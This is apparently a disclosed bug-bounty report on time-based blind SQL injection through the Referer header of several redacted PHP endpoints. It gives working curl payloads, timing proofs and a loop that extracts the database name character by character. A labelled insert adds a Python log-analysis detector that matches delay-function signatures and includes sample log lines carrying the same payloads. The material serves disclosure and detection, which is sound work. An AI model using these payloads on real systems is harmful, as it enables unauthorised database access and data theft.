[████] SQL Injections on Referer Header exploitable via Time-Based method
High
Vulnerability Details
**Summary:**
SQL Injections on Referer Header exploitable via Time-Based method
**Description:**
https://owasp.org/www-community/attacks/SQL_Injection
## Impact
https://owasp.org/www-community/attacks/SQL_Injection
## Step-by-step Reproduction Instructions
First, the vulnerable endpoints:
https://███████/███████/library.php?alert=
https://██████████/████████/Chart01.php?alert=
https://████████/████/Chart02.php?alert=
https://██████████/█████████/Chart03.php?alert=
https://████/█████Prod.php?alert=
https://██████████/█████systems.php?alert=
https://█████████/██████████db.php?alert=
(Don't miss the alert GET parameter...)
Okay, let's check the SQLi. Let's use time and curl with a true condition (1=1): if 1=1, the server sleeps 20 seconds, else nothing (I just wrote false to make it explicit for you):
```
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'" --url "https://████████/█████/Chart01.php?alert="
```
Okay, then let's check the response:
```
Thank you - you may close this window
real 0m21,447s
user 0m0,029s
sys 0m0,000s
```
The time is 21 seconds. Now let's change the if condition to a false one (1=2):
```
time curl -s -H "Referer: '+(select*from(select(if(1=2,sleep(20),false)))a)+'" --url "https://████████/████████/Chart01.php?alert="
```
Response:
```
Thank you - you may close this window
real 0m1,806s
user 0m0,016s
sys 0m0,008s
```
Hmm, approx. 2 seconds. That's proof it's vulnerable. Let's try more.
I want the first character of the current database name. Let's go for it:
```
for i in {{a..z},{1..9}}; do echo "Testing $i char:"; time curl -s -H "Referer: '+(select*from(select(if(substring(database(),1,1)='$i',sleep(20),false)))a)+'" --url "https://████/██████/Chart01.php?alert="; done
```
And every answer from time is about one second, except for m!
```
Testing l char:
Thank you - you may close this window
real 0m1,321s
user 0m0,028s
sys 0m0,000s
Testing m char:
Thank you - you may close this window
real 0m21,299s
user 0m0,019s
sys 0m0,010s
Testing n char:
Thank you - you may close this window
real 0m1,331s
user 0m0,016s
sys 0m0,012s
```
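The timing signal the report relies on is also what makes this class of injection visible on the server side: the delay primitive shows up in the Referer (or query string), and the request takes an order of magnitude longer than its neighbours. The following detection script is an added example, not part of the report or the affected application. It assumes an Apache combined log extended with `%D` (response time in microseconds) as the trailing field; the sample log lines are constructed, with the paths and client addresses invented and the Referer payloads mirroring the ones shown above.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import unquote, unquote_plus

# Assumed log layout: combined log format plus Apache's %D (microseconds) as the
# last field. Adjust LOG_RE to match your own server's LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<us>\d+)$'
)

# Delay primitives used by time-based blind SQLi on MySQL, PostgreSQL and MSSQL.
DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)

# Constructed sample lines (not taken from the report). Lines 4 and 5 carry the
# Referer payloads shown above; line 6 is a slow request with no obvious signature.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2020:10:00:01 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "https://example.test/dashboard" "Mozilla/5.0" 1310000
10.0.0.6 - - [12/Oct/2020:10:00:02 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "https://example.test/dashboard" "Mozilla/5.0" 1320000
10.0.0.7 - - [12/Oct/2020:10:00:03 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "https://example.test/dashboard" "Mozilla/5.0" 1330000
10.0.0.9 - - [12/Oct/2020:10:00:05 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "'+(select*from(select(if(1=1,sleep(20),false)))a)+'" "curl/7.68.0" 21447000
10.0.0.9 - - [12/Oct/2020:10:00:27 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "'+(select*from(select(if(1=2,sleep(20),false)))a)+'" "curl/7.68.0" 1806000
10.0.0.9 - - [12/Oct/2020:10:00:30 +0000] "GET /app/Chart01.php?alert= HTTP/1.1" 200 37 "https://example.test/dashboard" "curl/7.68.0" 15000000
10.0.0.5 - - [12/Oct/2020:10:00:31 +0000] "GET /app/library.php?alert= HTTP/1.1" 200 37 "https://example.test/dashboard" "Mozilla/5.0" 900000
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]
    rec["seconds"] = int(rec["us"]) / 1_000_000
    # Decode once so percent-encoded payloads do not slip past the signature check.
    rec["referer"] = unquote(rec["referer"])
    rec["query"] = unquote_plus(rec["target"].partition("?")[2])
    return rec


def analyze(log_text, slow_factor=5.0, min_samples=3):
    """Flag requests that carry a delay primitive or take far longer than their
    endpoint's median response time. Returns a list of findings in log order."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]

    # Per-endpoint timing baseline, built from everything seen for that path.
    by_path = defaultdict(list)
    for r in records:
        by_path[r["path"]].append(r["seconds"])

    findings = []
    for r in records:
        reasons = []
        if DELAY_RE.search(r["referer"]) or DELAY_RE.search(r["query"]):
            reasons.append("delay-function signature")
        samples = by_path[r["path"]]
        if len(samples) >= min_samples:
            baseline = median(samples)
            if r["seconds"] > slow_factor * baseline:
                reasons.append(f"response {r['seconds']:.1f}s vs median {baseline:.1f}s")
        if reasons:
            findings.append({"ip": r["ip"], "path": r["path"],
                             "seconds": r["seconds"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['seconds']:.1f}s: {'; '.join(f['reasons'])}")
```

The two checks are deliberately independent: the signature catches the false-condition probe (1=2) even though it returned quickly, and the timing outlier catches the slow request on line 6 even though nothing in it matches the signature list. The median baseline is computed per path because a reporting endpoint that normally takes a second should not be judged against a static page that takes milliseconds.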
Thanks for reading!
One of these injection points was supposedly fixed in report #995122 (report disclosed and resolved, but it's not fixed).
Report Stats
- Report ID: 1018621
- State: Closed
- Substate: resolved
- Upvotes: 5